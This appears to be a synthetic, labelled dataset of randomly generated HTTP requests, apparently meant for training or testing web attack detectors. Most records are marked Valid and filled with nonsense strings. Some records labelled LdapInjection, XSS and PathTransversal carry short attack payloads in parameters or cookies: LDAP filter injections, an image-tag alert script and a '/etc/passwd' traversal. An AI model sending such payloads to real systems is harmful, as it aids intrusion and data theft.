Referer: /eatbaabg/lkns/lewe.fgf
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.6 (Windows; U; Win98 5.6; a1-ej; rv:9.9.0) Gecko/77628208
UA-CPU: StrongARM
UA-Disp: 515,5737,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 997x477
Via: FTP/5.7 63.125.4.29, 1.6 179.184.27.229, 1.3 www.a9onq.png
Transfer-Encoding: compress
Upgrade: hossa/8.6
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 35345
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8127
Start - Id: 25265
class: Valid
GET /RZ/pYjlRP@-sEw/HdsamEKfetcT/rildh1jRotjEce/oratnlndui/N8ooecoaldo11ajz6hyr/xpr4dF/y7URmu/eet0u.msf? HTTP/1.0
Host: 168.73.161.185
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=00971
Client-ip: 142.23.146.55
Cookie: lllr=~Ete3rbhometizot;886lLtaerninoE=tay.CaFRg;hr2tc3tcNnrenn=254489;tegzehx=886;oM6uiJoost=3966
Cookie2: $Version="33"
Date: Wed, 25 Feb 04 24:02:15 GMT
ETag: W/"an6QYv7yVXxx@gHYz"
Expect: 100-continue
From: e8ue@ouofs.gov
If-Modified-Since: Mon, 30 Jul 07 23:46:07 GMT
If-Unmodified-Since: Thu, 13 Jan 05 11:32:54 CET
If-Match: "_8@4Eg36ZEsXTrC_v8mk"
If-None-Match: "3.Y51Co5wETSDh@Q92"
If-Range: Thu, 16 Feb 06 05:21:46 GMT
Max-Forwards: 3891
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM UHphdGVnMFN0ZWx0cnJqZnZ0ZXRFYW1yZ25vb3JuenJhYmNUdHE4
Authorization: Digest opaque="gseern"
Range: -0,40-
Referer: http://asfhibf.cz/ntwioti/iarT/ab1e5nnn/rdelqaTn.txt
TE: chunked,deflate;q=0.3
Trailer: Trailer
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 7.7; rl-lu; rv:7.8.3) Gecko/50254486
UA-CPU: x86
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4028x8502
Via: h6s/0.9 18.80.62.142, 4.8 www.sak7tnk.png, 3.1 www.aiAcni.html
Transfer-Encoding: deflate
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25265
Start - Id: 29831
class: Valid
GET /takalnwie4fnsssbhei/jiutt4hPpbiwteNnr/yF48htuetycst.js?iemAaocni=1408484&m0hsioohiwhc=n2nsHntl9N&.8TOC6FadminyO=ith%7Edeletekgroup+byt8oAlmc&6JUPS_yusrtL=236049&accept_wNn%ur2Y=950huneoju&eho61rg=478597&etIy=nnta&FXDozT0qNU=26&toSYeeh=953526586&hemtttf2tkrrsa=t%40neg+iemewAino2tn+&te8=iooltvilae&v2hn4sicneqg4Se=lrznh&reFAerir=rformfp&pem2megraenlnk=o0dVwIgv HTTP/1.0
Host: 156.3.11.133:80
Connection: msdmb
Accept: image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 220.75.77.237
Cookie: me3nwroqeiftbL2=S6ni5ode4ahodwHe;RHdocumentecholetcBydivC7J=adminairwhcpr?ajgs
Cookie2: $Version="7"
Date: Sun, 07 Mar 10 03:24:13 GMT
ETag: W/"F18o.XlNRAEhwIOPq-"
Expect: yiie7bb
From: rbldtdG@o7aniAtsO.ch
If-Modified-Since: Sun, 29 May 05 10:53:41 UTC
If-Unmodified-Since: Tue, 10 Apr 07 15:14:46 GMT
If-Match: *
If-None-Match: *
If-Range: "xbQ4oicGu.bpze7zd"
Max-Forwards: 22
MIME-Version: 7.9
Pragma: 0mnn='lfjln2i'
Proxy-Authorization: msfja kissaf=Rn4lrtpj
Authorization: Basic cmFUZ2VlOm9icGlmcA==
Range: 9669-56204,57635-,19451-
Referer: http://www.cca0c.gov/eR8wt/eaeisene.conf
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: sKfFY4 http://www.sriC.st
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 238x9907
Via: HTTP/3.5 www.ddoe7D.html, FTP/9.3 www.r7ba.shtml, fiay/7.1 170.71.190.133:88873
Transfer-Encoding: gzip
Upgrade: eao/6.7, qpa/6.7
Warning: 757 171.183.186.152:6 "lkOups" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 211553371251
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29831
Start - Id: 26562
class: Valid
GET /wgak/ekp0tWeu26Gfo5/uE6au/JusrriN6LUhomeGqF_A./h9BlsBwVfDU/i3TiDe0PH7mSq8/assmrrtD.mdb?n4FWlM3K=ae0b%26o+oa&kthisna=8ttuo0&cea=fiechod+oe3ckGr&dqpsl8ubDf=9274&SOouflEed=8771&i0b=nperlshihttpNrall&eerOa6iutoosrc=tnslae8aeit0&i1unleen8ue=lQ4&JZDchildwinntgVCK=acc4shEolgnze8&7k1v=oqkNKFUf&edivSdVz4zoM=r+t&eslmtite=paccess_logda&ipnygvgtpou=oel&h0JNtexec=%3Cts HTTP/1.1
Host: 60.53.27.24
Connection: 1eed9
Accept: audio/*;q=0.5, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, identity, deflate, identity;q=0.5, gzip;q=0.6
Accept-Language: nnsoi-qu4uE, oct6itlI-a;q=0.1, sattu-urifsrg;q=0.2
Cache-Control: max-stale=989
Client-ip: 126.247.210.228
Cookie: eqio=saox;BAOeF9MYIWzZ=OIet4msoe;Sof3adTrtoflut=08;e1e=tk8L
Cookie2: $Version="44"
Date: Wed, 15 Mar 06 19:27:24 UTC
ETag: "me7Bfm5tZUSOpsA"
Expect: 100-continue
From: hsmea@trwedetLf.ch
If-Modified-Since: Tue, 27 Jan 09 17:07:34 UTC
If-Unmodified-Since: Thu, 21 Jan 10 04:30:17 CET
If-Match: *
If-None-Match: "y7nXiJjpo5A@7TJU-"
If-Range: *
Max-Forwards: 13
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM bnI1ZWx0dWVvaW53YWVkOXBpYThidHpzbnRyMHlwaGlu
Authorization: Yaol Ibf4i=r2hrcede
Range: 9769-87960,68614-
Referer: http://unxinmb.gov/iivnat/ne4cu8E/mdtezh/nhr7a/lowbn.exe
TE: trailers
Trailer: If-Match
User-Agent: 11dc (oWhAGn)
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0753x702
Via: 1.9 www.7cior7tf.png:604
Transfer-Encoding: identity
Upgrade: itrxt/3.8, zdmh/3.6, Tmtet/5.7, 8t6vuj/5.9
Warning: 441 www.aram.shtml "aigi2urFwunlumclaef" "Fri, 26 Aug 05 10:11:16 CET"
X-Forwarded-For: 223.165.230.236
X-Serial-Number: 693373977262
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26562
Start - Id: 26030
class: Valid
GET /i859-eQdzub_1bgT2/ddlocationnY/-5H4/0ohsrsynoounnloasl/reSqhuffsstngldAu/wjgUJKSyvH1tnwv6gnw/k.H5CQc6aSHWY4/e0C2C_eWXDHbJHzjO/encN4dnen5a/dt5bdhsofsmveV/EoRKgroup byfrom1WformifO8/rnt.pl?tAcAeecuPo=%5Dre%7C&lti4aGr7eytga=SPet&corre=gr3hJ4t&shttewEaL=iexectua2e8epsem%27ucy&uiusrotdzphih=8468&ia4aIrfQss9=13081961&epiaet=534 HTTP/1.1
Host: www.tqpAurQvo.fr:251
Connection: eof8
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 34.105.255.188
Cookie: iobn=jkcrotiwhrusnl
Cookie2: $Version="7"
Date: Thu, 25 May 06 09:47:08 CET
ETag: "7wUBl2V0wMQ5Eg3Es"
Expect: 100-continue
From: 3seat2ct@Cn4ntSeii.com
If-Modified-Since: Thu, 03 Jan 08 18:43:53 GMT
If-Unmodified-Since: Sat, 25 Aug 07 19:18:47 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Oct 05 05:56:46 CET
Max-Forwards: 261
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: Digest algorithm=MD5-sess
Range: -7
Referer: /a6ian1/rc7r.pdf
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: asYH3qR http://www.uxpafch.it
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4161x5305
Via: 7.1 www.trm4but7.png:48, eDa1et/2.2 249.42.202.83:9747
Transfer-Encoding: compress
Upgrade: lr6nji/0.6, no2fo6/1.2
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 212.160.180.28
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26030
Start - Id: 24230
class: Valid
GET /hdweh/o@_xcspvx@UaScU/Dlrhv5arh/yaeU0nnvundfvToaa/2@w_n0qE4_HVoLGjDXR/62rNSoYtj38XRYF/ech/m8Igr2vD/jt48oe9tS6h4ab0en.css? HTTP/1.1
Host: 28.243.173.159
Connection: keep-alive
Accept: text/plain, image/png;q=0.5, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 38.8.118.31
Cookie: update_exec_3iXj=r5:
Cookie2: $Version="704"
Date: Fri, 24 Jul 09 05:10:08 CET
ETag: "36bzC1d_MvE69Aj.xtI"
Expect: 100-continue
From: s0hwns@eIpjfyve7i.ch
If-Modified-Since: Mon, 20 Jul 09 08:45:00 UTC
If-Unmodified-Since: Tue, 05 Apr 05 17:29:27 GMT
If-Match: "Ah_Xq-94NB93Bm2kC"
If-None-Match: "@9-.hYgteXGd1AJOzC5"
If-Range: *
Max-Forwards: 6894
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="anyiee"
Range: -8088,1567-
Referer: /siFyi/znlefhte/ps1tl.shtml
TE: trailers
Trailer: If-None-Match
User-Agent: oSNSIJ http://www.ry47ei.cz
UA-CPU: Sparc
UA-Disp: 431,4437,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 982x566
Via: FTP/6.0 www.mbay.png, exe/5.4 www.ImY0.gif
Transfer-Encoding: arA4
Upgrade: 0O9/0.3, eie/2.8, dasr/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 190.104.194.11
X-Serial-Number: 58849092
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24230
Start - Id: 38226
class: LdapInjection
GET /eKCjw-5JeiVYq6/LOmail0a6jWS/oUEhK0MtjM-p8@UaN@.dll?hyAoDseioc=esdaig2ar2emr&el4nsittolTrw=8&c7OTfte=dtlyohr&4iodwaom8a=t%3Edca1r2w&zh9Z-t1xaH=ecti&rgjjKXDAB=yybGhlCbllb9&1s0elH=124&2ES.dAb9=%29%28++%7C+%28displayName%3Dhad*%29++%28name+%3D++++had*+++%29%28+mail%3Dhad*+++%29 HTTP/1.0
Host: www.btymre.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: euc-cn;q=0.1, iso-8859-8, windows-1251
Accept-Encoding: 
Accept-Language: iun-w4;q=0.9
Cache-Control: max-age=14
Client-ip: 136.113.62.155
Cookie: HF8b6http1=6389;dJuntnt=75pgekoesY9tObtvno;eenyoe3fvcc=eoin;rss=sddtypataNnoubi4;sedeed=ue;EdI57ornAnia=0975
Cookie2: $Version="541"
Date: Thu, 13 Jul 06 15:09:22 UTC
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Wed, 08 Jun 05 09:05:05 GMT
If-Unmodified-Since: Fri, 04 Sep 09 13:25:59 CET
If-Match: "l3Wr.s4F_oiop.mOHf"
If-None-Match: *
If-Range: "rnUm61JnvBA7IZp"
Max-Forwards: 57
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: olshew aitLt=niTeot
Authorization: sipa oedx=TDdea
Range: 491-,605-2708,157323-67914
Referer: /sdKxl.cfm
TE: trailers
Trailer: Accept-Charset
User-Agent: r7n070ees8 (tE_VBCD-I; 4GhokEgWQ8)
UA-CPU: StrongARM
UA-Disp: 5667,2371,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6388x208
Via: FTP/9.6 153.243.239.113, HTTP/2.0 27.189.123.231, 9.2 232.132.70.100
Transfer-Encoding: eApt
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 47317311019714332645
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38226
Start - Id: 39082
class: LdapInjection
POST /e4yoaeEum5njterhxoy/wdYO/.2O8i854/7inUhtiasbltab/7145HgRmLj1Mfy1/hnHxbtst/INbPgroup by-j2HiQ/rmheZtnAugrsMua/srXJw4H1kS7Ugx0/eULuojgU3L.swf? HTTP/1.1
Content-Length: 241
Content-Language: teqdwh
Content-Encoding: deflate
Content-Location: http://www.m6Nhzslo.fr/hr2nla8F/rritny.mpeg
Content-MD5: em53N2g0MFdlb21sd3BzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Feb 06 05:41:14 CET
Last-Modified: Tue, 29 Aug 06 02:12:01 UTC
Host: www.ticl7ota.ch
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.0, ks_c_5601-1987;q=0.7
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 95.95.18.133
Cookie: -Nbz76dV48=035271531;jizg=8;oes0Ae=tla)(  | (gtuee=*);NbEaeiaicercoDg=tsf
Cookie2: $Version="6"
Date: Tue, 03 Oct 06 01:26:51 GMT
ETag: "Y3K-i-yhG-sUGOk9d"
Expect: aeO1Anr=fno2;aymr
From: e4cet@emnnrm.net
If-Modified-Since: Tue, 27 Dec 05 10:12:56 UTC
If-Unmodified-Since: Sun, 21 Nov 04 12:30:01 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Jun 05 14:42:39 GMT
Max-Forwards: 611
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: seyne9 hsjrs=osdEn
Authorization: Basic dHJKdWhvOmdhaXRu
Range: 873758-,119-,-34849
Referer: http://www.dlmuic.de/d0ea3epn/sens/lmteoa6/r2so/tWhnesxq.txt
TE: deflate;q=0.3
User-Agent: Mozilla/5.7 (X11; U; Unix 7.7; ep-tn; rv:2.1.8) Gecko/18723134
UA-CPU: x86
UA-Color: color16
UA-Pixels: 8769x0131
Via: HTTP/9.4 9.210.175.80, 0.3 12.96.114.39, 9.2 85.30.89.13
Transfer-Encoding: 5aMc; rxiort5=Eqoo
Upgrade: aefapw/7.1, Svcea/8.4
Warning: 529 www.iaEnlc.shtml "HhusNdbemwiiMof7rg" 
X-Forwarded-For: 22.168.245.53
X-Serial-Number: 89933441893
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rpelimdn=aisehe1toetd&eAe4s=sstsio&poth=i&eLtleL5J=mwc Hs)&S2alibehttp0dFQhtacces-j=25&heeppo=30894&rei=771&LsethRfpezc=oo %u1wit\s$E]  eo&eiouaasnhei=6AhtnD kt;ihnnSeservices&i6efxh=57&iiibr=dejWn&s5lioiiy=lwi&styleAMD6VUyiN@Q=e

End - Id: 39082
Start - Id: 47578
class: XSS
GET /djejmizotibahj9e/i@Zs3@MYgFK/i3pctrir/nanis6toideletsa/hdhr/se6Ohezwy64S/j1tttsbatietnlitn/RJJRq3varqdphppFRRO/trebstj/ytTCtF3thYQ0.mdb?eaumatebereti=terroj&neaeelmrb9h=-saevalU&ee=v+r&sxi=350467&smlaR=9302850600&hinos=%3Cimg++++src%3D%26%7B%5Balert++++%28%27csvdidh%27%29%3B%5D%7D%3B+%3E&stod=saaD&xstylesystem1Xc3TunionP-Z=nin&@dPnMbuii=15&lde=ay7%7E HTTP/1.1
Host: www.QOTdrnds.it
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: iti-nnnsilo, a3to-xeAi;q=0.2, y-npuiew;q=0.7
Cache-Control: no-store
Client-ip: 118.106.166.150
Cookie: mW7D=isao7d9eno
Cookie2: $Version="655"
Date: Mon, 25 Feb 08 02:11:02 UTC
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: ih1treV=Hro8bc;fphyedn=8usRht
From: i5nNat@viikl.cz
If-Modified-Since: Sun, 20 Feb 05 12:55:03 UTC
If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "s7b7MVjb72gaeV.54hD"
If-None-Match: *
If-Range: *
Max-Forwards: 402
MIME-Version: 4.9
Pragma: aEsf='6Nte'
Proxy-Authorization: lttc 1geto=iareHg
Authorization: NTLM alNyZXVUYXV3NnlpNWViY2lIdHVuaXN0a2VzYWFnbmVEMHNpcw==
Range: 7-,-18566
Referer: /mwuE/m9qtat/shlE/p5i4.jsp
TE: deflate;q=0.6,deflate;q=0.8,deflate;q=0.9
Trailer: If-Match
User-Agent: Mozilla/3.3 (Windows; U; Win98 3.2; tr-n8; rv:1.4.1) Gecko/65213513
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: eenbH; ysete=etomFen
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 205 168.163.244.39 "rui0nun" "Thu, 26 Jan 06 03:08:13 CET"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47578
Start - Id: 13058
class: Valid
GET /U9flnKdtthip/cM_erj8koNVwAJV/pnebuole3fooa9ot/ha0ty5syeoei/lftrdtmrhpkyurutmeA.jpg? HTTP/1.0
Host: 210.163.169.65:3361
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: *
Cache-Control: min-fresh=47156
Client-ip: 215.148.83.171
Cookie: ouuylhth2o4ote=shno
Cookie2: $Version="21"
Date: Sat, 27 Jan 07 20:23:56 GMT
ETag: W/"@Ix4QP9PqBJLkjh-Oj"
Expect: 100-continue
From: Henettnv@trgwce.uk
If-Modified-Since: Thu, 12 Feb 04 23:20:02 GMT
If-Unmodified-Since: Tue, 13 Jan 09 04:23:20 GMT
If-Match: "1vtbHW@uCo64sT_"
If-None-Match: "-Mqu4@LZ4ePxPRR"
If-Range: Fri, 18 Jul 08 17:06:49 GMT
Max-Forwards: 4
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Basic c3RhaW84bDppdzJyYUhnbw==
Range: -60,7393-,8511-
Referer: /NnuLemof/fsq8niau/m2ujeo2/4t5h.html
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 4.3; qo-dp; rv:7.3.1) Gecko/18577577
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x190
Via: 5.6 117.109.226.187, 6.1 53.119.82.60
Transfer-Encoding: compress
Upgrade: er4nxy/4.1, isaqen/1.6, iN16e/5.5
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 11062
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13058
Start - Id: 10513
class: Valid
GET /o-A47u/cee/O3k7phpDyYbinNTja/ecUlaQ1stpokeLueLm/xgrd9t8i2aeetds6a/nk4a2e1tEios8i8z/z2/iJrhU/YSz7DTIzqtJ2h/Trqmytgssn/3AZnA0hFap4g0ACmX2Lm/0ieTa7uasu3iregv.shtml?mhg4aassm2o=oK5HKjXUT5N5&MVSvbscriptxsQBVuv4=omhttp%3Bdeil+is+ss&ntaoiee9wki=ySe&cnrRtda7ver8ee=+%3DohAih%3Fl%3Bp%3C&hcett=0aHiiens&_q3lMtvRI=0rmb&nr4s=dMsdtcs%2Ft9iij&F38ESeld=766432&bSen49=5070&iorsbnroenbuesa=nKIC5Br9_F. HTTP/1.0
Host: www.2trhdet.st
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesesimp, euc-kr, cp-932, x-mac-chinesesimp, iso-8859-3
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: *
Cache-Control: y0bsnt=Hs
Client-ip: 221.206.174.173
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="25"
Date: Sun, 21 Jan 07 02:23:25 GMT
ETag: "GPGbZZ5jTNw4Y5hp"
Expect: 100-continue
From: r1ahidt@tnaomtA.it
If-Modified-Since: Tue, 26 Oct 04 02:18:58 GMT
If-Unmodified-Since: Mon, 07 May 07 13:44:53 UTC
If-Match: *
If-None-Match: "JcfaQiuJhyZtnWcj"
If-Range: *
Max-Forwards: 5751
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: NTLM cmVvcmNsdWhlbWVzenBsMmVCNEhvaWVldWxodGxwMnA=
Range: -11352
Referer: http://www.nhtVne.fr/tefrnw/7Jtjeva.mp3
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: oreALW@gXM http://www.tara8tii.uk
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: 3.3 74.191.44.96, 8.6 212.17.106.245
Transfer-Encoding: deflate
Upgrade: 6Elor/3.8
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 44987486
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10513
Start - Id: 32781
class: Valid
POST /g9e1t/dwW-af_e/czncfyretyiad3l/balat8/cCkP9-.tiff? HTTP/1.1
Content-Length: 174
Content-Language: lid0r3,oeftArS
Content-Encoding: compress
Content-Location: /wejJUY/rchi6/8eAtoety.cfm
Content-MD5: aGRwZW5oc3R1bHJtbWU3Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Jul 05 13:27:11 GMT
Last-Modified: Wed, 10 Jan 07 10:59:31 UTC
Host: 157.48.248.164
Connection: dtsbigi
Accept: text/plain;q=0.3, video/quicktime;q=0.3, application/zip;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: htnm-rhw, aas2u-spl;q=0.2, ad-tlernt;q=0.9, u-a
Cache-Control: no-cache
Client-ip: 131.243.46.172
Cookie: ercnceekyatN=mHHerChaarDeueqjgu;eSupdryHgnntrue=7532311;IesoecinpEm=ht;usto3dachwe=lsxar;1irt=23433;oedoa=8030
Cookie2: $Version="07"
Date: Sat, 08 Apr 06 13:38:54 UTC
ETag: "Yinajk@_Q-@G_cPmwPjA"
Expect: 100-continue
From: tat1a4z@I9Mfqr80t.gov
If-Modified-Since: Tue, 02 Feb 10 07:08:40 CET
If-Unmodified-Since: Sat, 11 Apr 09 15:32:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: Digest response="4eBbaEDCFd8Adb30DEcfb719e9C2BDB6"
Range: 39-,156281-891264,-22
Referer: /1r9Nto/Ocowes/bt6ende.cgi
TE: deflate
Trailer: Trailer
User-Agent: sppr9/6.0
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4217x4135
Via: FTP/3.0 105.172.88.236, 4Es/7.6 215.4.15.19, 3.6 232.203.123.227
Transfer-Encoding: deflate
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 996 147.75.243.10:642 "tcdaept7t" "Tue, 25 Jan 05 06:28:09 UTC"
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 635173454093357601
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5tnlafugOnatu=hroadk&Vgxmlaccess_logoptQexecm=2469316&xqdhadgdemrtyes=u@JrARA7j2t&wmg3saW7b7tsopi=Zsgo$mails|o wn&5FdGtmp7qAWB2=ownnode&9tefanh=77610729&fivf8Elii=atdt9

End - Id: 32781
Start - Id: 5891
class: Valid
POST /ioXsDeoEIXW8eC/T2korarwnmumeatytnog/b51Do-l-0PnA3oyB/s4qWK_PieeK5sTi.IOjD/iqSfMx8@ASV7vIS/QTKCE8/fTBFP2-751JmHrgSzT.jpeg? HTTP/1.0
Content-Length: 127
Content-Language: IeleeKe,hxamo,ecleta
Content-Encoding: compress
Content-Location: http://mwsVdset.gov/lnoi.wav
Content-MD5: WU5odHN5N2JpaUFubWVvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 May 04 20:38:25 UTC
Last-Modified: Sun, 01 Aug 04 10:42:57 GMT
Host: www.nth6h.biz
Connection: tlw0ln
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: hzdl=u
Client-ip: 59.190.14.21
Cookie: poiuidpcuxiCoao=6;q2BC7iinsert=5;anzet1ie=ceaA
Cookie2: $Version="581"
Date: Sat, 21 Jul 07 13:06:47 CET
ETag: "40mG.ozhWuHcVOU_2z"
Expect: ai6fyed=Uts8
From: agooHtet@mzaattdn.ch
If-Modified-Since: Mon, 05 Feb 07 18:01:49 GMT
If-Unmodified-Since: Sun, 07 Mar 10 19:42:45 UTC
If-Match: "8WBcBnozLdEZ5ie0iMA"
If-None-Match: *
If-Range: Mon, 10 Apr 06 05:28:18 UTC
Max-Forwards: 749
MIME-Version: 0.9
Pragma: sslc5c=t
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXV3bmFxc2lJVGVpZDVmbTR0c2lyZnZsbGxNbzZvdGVreXhmc2Y3b2UybmpU
Range: 7755-,3233-
Referer: /soilke.pdf
TE: deflate;q=0.0,trailers
Trailer: If-Range
User-Agent: sIetoaic8d/1.8.4.8.3
UA-CPU: x86
UA-Disp: 895,7184,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 119x636
Via: HTTP/6.5 229.183.246.246
Transfer-Encoding: gzip
Upgrade: 1ncfmr/8.6, ihjw6/9.1, 6be57y/1.3, nouoie/8.5, sehtoe/9.2
Warning: 517 www.cRe1eoe2.js "y4eeAaytrtnxsi9a4ne" 
X-Forwarded-For: 229.92.118.231
X-Serial-Number: 673720584538972
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nwu=dJjW&oahpwr=e locationek&e2=dj&tAemuornpd=7lAmcmalad&todmyhee=77774827&gsin=t0ia&en0noeeTmd5Azn=9bptGtteie&dsr5e6e=9i7eebSo

End - Id: 5891
Start - Id: 36325
class: PathTransversal
GET /vPM/X37lI/g.pOF/acCzyp.g_wY8llGk/oCzghdl/cYbV7HL/dmq3eoheea3njiu5st.shtml?toeBaRr=%2Fetc%2Fpasswd&9xkDZermwdeleteyEw=rlaTne&EtlosssZren=93&OsMxtaYoso1snf=603&maowiriOit=5633&sesimrhaelhioe=3 HTTP/1.1
Host: 16.1.28.239
Connection: keep-alive
Accept: audio/*;q=0.4, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=05
Client-ip: 112.98.95.4
Cookie: GQTDj0=e-MG4A;ub6einq2xnqlhdt=NalertZ;zeDel=o4LQ8_SR;IlueaEeE=tfyvousEvu
Cookie2: $Version="8"
Date: Tue, 08 Jan 08 21:28:49 UTC
ETag: W/"XVnSSkhMGncEq258"
Expect: Ise1ssl
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 27 Feb 09 10:35:11 GMT
If-Unmodified-Since: Sun, 19 Aug 07 05:16:47 GMT
If-Match: "0VFWhMvnXTBb7A6dOh"
If-None-Match: "G4_zTr.Z2pmJyXh"
If-Range: Wed, 18 Jan 06 23:53:39 GMT
Max-Forwards: 901
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
